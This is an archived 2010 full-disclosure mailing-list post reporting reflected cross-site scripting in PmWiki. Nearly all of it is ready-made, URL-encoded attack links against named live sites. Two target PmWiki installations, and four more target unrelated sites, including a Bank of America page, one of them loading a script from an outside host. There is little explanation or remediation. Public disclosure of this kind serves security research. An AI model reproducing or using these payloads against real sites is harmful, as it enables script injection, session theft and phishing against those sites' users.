[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] xss in PmWiki
From:       dave b <db.pub.mail () gmail ! com>
Date:       2010-12-14 16:37:53
Message-ID: AANLkTik7NLu6noi7Tvp-C9wbu1hPdx2wnTE8x+7QLvrD () mail ! gmail ! com
[Download RAW message or body]

Hi you can xss pmwiki like this:
http://dtcsupport.gplhost.com/Main/WikiSandbox?from=%22/%3E%3Cbody%20onload=alert%281%29%3E


Also the above it seems to behave differently across versions of pmwiki.
If it doesn't work ...html injection like this should:
http://www.pmwiki.org/wiki/Main/WikiSandbox?from=%22/%3E%3Cinput%3E

Oh if you bothered to read this far... here have some more xss:
http://www.bankofamerica.com/remax/?siteid=%22/%3E%3Cscript%20src=http://ha.ckers.org/xss.js%3E
 http://www.vmworld.com/registration.jspa?sponsorCode=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
 https://www.digicert.com/custsupport/legal_policies_table.php?color=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
 https://secure.instantssl.com/renew/index.html?u=%22/%3E%3Cscript%3Ealert%28%27puddi%20puddi%27%29;%3C/script%3Exxx


--
Always the dullness of the fool is the whetstone of the wits.		--
William Shakespeare, "As You Like It

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic